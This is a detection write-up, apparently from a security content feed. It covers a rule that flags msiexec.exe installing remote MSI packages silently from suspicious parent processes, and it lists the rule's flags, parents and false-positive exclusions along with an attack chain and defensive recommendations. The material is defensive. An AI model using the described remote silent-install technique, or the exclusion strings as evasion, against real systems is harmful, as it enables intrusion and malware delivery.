Potential Remote Install via MsiExec

Adversaries may abuse Windows Installer (msiexec.exe) to perform remote installations of malicious payloads. This technique is used for initial access, defense evasion, and execution of arbitrary code. The detection rule identifies attempts to install a file from a remote server using MsiExec. The rule looks for msiexec.exe processes running with arguments such as -i, /i, -p, or /p, indicative of remote installations, and executed from suspicious parent processes like sihost.exe, explorer.exe, cmd.exe, wscript.exe, mshta.exe, powershell.exe, wmiprvse.exe, pcalua.exe, forfiles.exe, and conhost.exe. The rule includes exceptions to reduce false positives from legitimate software installations, specifically excluding command lines containing --set-server, UPGRADEADD, --url, USESERVERCONFIG, RCTENTERPRISESERVER, app.ninjarmm.com, zoom.us/client, SUPPORTSERVERSTSURI, START_URL, AUTOCONFIG, awscli.amazonaws.com, */i \"C:*, and */i C:\\*. This technique can lead to complete system compromise and data exfiltration.

Attack Chain

1. An attacker gains initial access via an unspecified method (e.g., phishing, exploit).
2. The attacker uses a script or command-line interpreter (e.g., cmd.exe, powershell.exe) to initiate the msiexec.exe process.
3. The msiexec.exe process is launched with arguments that specify a remote MSI package (-i, /i, -p, /p) and enable silent installation (/qn, -qn, -q, /q, /quiet).
4. The msiexec.exe process downloads the MSI package from a remote server over HTTP or HTTPS.
5. msiexec.exe executes the downloaded MSI package, which may contain malicious payloads.
6. The malicious payload executes, potentially performing actions such as installing malware, establishing persistence, or escalating privileges.
7. The attacker gains control over the compromised system.
8. The attacker performs further actions, such as data exfiltration or lateral movement.

Impact

Successful exploitation can lead to arbitrary code execution, allowing attackers to install malware, steal sensitive data, or disrupt system operations. A compromised system can be used as a pivot point to access other systems on the network. The impact can range from data breaches and financial losses to reputational damage and disruption of critical services. The number of potential victims depends on the scope of the initial access and the attacker’s objectives.

Recommendation

• Deploy the provided Sigma rule to your SIEM to detect suspicious MsiExec invocations with remote payloads.
• Enable Sysmon process creation logging (Event ID 1) to ensure the required data is available for the Sigma rule.
• Investigate any alerts generated by the Sigma rule, focusing on the parent process, command-line arguments, and network connections associated with the msiexec.exe process.
• Monitor process execution events for child processes spawned by msiexec.exe for anomalous activity.
• Implement application control policies to restrict the execution of msiexec.exe to authorized users and processes only.